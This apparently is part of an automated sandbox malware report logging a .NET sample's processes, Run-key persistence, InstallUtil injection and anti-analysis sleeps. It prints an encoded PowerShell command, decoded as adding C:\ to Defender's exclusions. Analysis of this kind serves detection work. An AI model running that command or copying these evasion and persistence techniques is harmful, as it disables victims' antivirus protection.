Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00414706 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 17_2_00414706
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1
Source: kyFBQxVbsg.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040D3C8 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 17_2_0040D3C8
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\cvxyttydfsgbghfgfhtd-RXTSAM
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kyFBQxVbsg.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: kyFBQxVbsg.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: Yara match File source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: kyFBQxVbsg.exe, hlrc.cs .Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrc.cs .Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Code function: 0_2_024A2827 push ebx; ret 0_2_024A287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8FF5F push es; ret 3_2_00C8FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004594FD push esi; ret 17_2_00459506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00431786 push ecx; ret 17_2_00431799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00453798 push eax; ret 17_2_004537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00452E76 push ecx; ret 17_2_00452E89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_0040CE58
Source: initial sample Static PE information: section name: .text entropy: 7.9984009418791
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe File created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00405CE1 ShellExecuteW,URLDownloadToFileW, 17_2_00405CE1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 17_2_004172C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 17_2_0040CE58
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040D26E Sleep,ExitProcess, 17_2_0040D26E
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe TID: 5096 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 6616 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 3488 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 17_2_00416FC6
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6076 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1160 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW, 17_2_00406571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe API call chain: ExitProcess graph end node
Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040620E FindFirstFileW,FindNextFileW, 17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0044A569 FindFirstFileExA, 17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00406EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043F394 mov eax, dword ptr fs:[00000030h] 17_2_0043F394
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00431347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0040F87E SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 17_2_0040F87E
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00431495 SetUnhandledExceptionFilter, 17_2_00431495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00438462 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00438462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043190C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_0043190C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle, 17_2_00414EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 17_2_0040FC77
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA== Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00415E25 mouse_event, 17_2_00415E25
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager2ee70d
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoW, 17_2_0044E084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_0044E1AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoW, 17_2_0044E2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044E381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoA, 17_2_0040D39C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: EnumSystemLocalesW, 17_2_00444444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoW, 17_2_0044492D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 17_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: EnumSystemLocalesW, 17_2_0044DCC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: EnumSystemLocalesW, 17_2_0044DD0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: EnumSystemLocalesW, 17_2_0044DDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_0044DE34
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Queries volume information: C:\Users\user\Desktop\kyFBQxVbsg.exe VolumeInformation
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
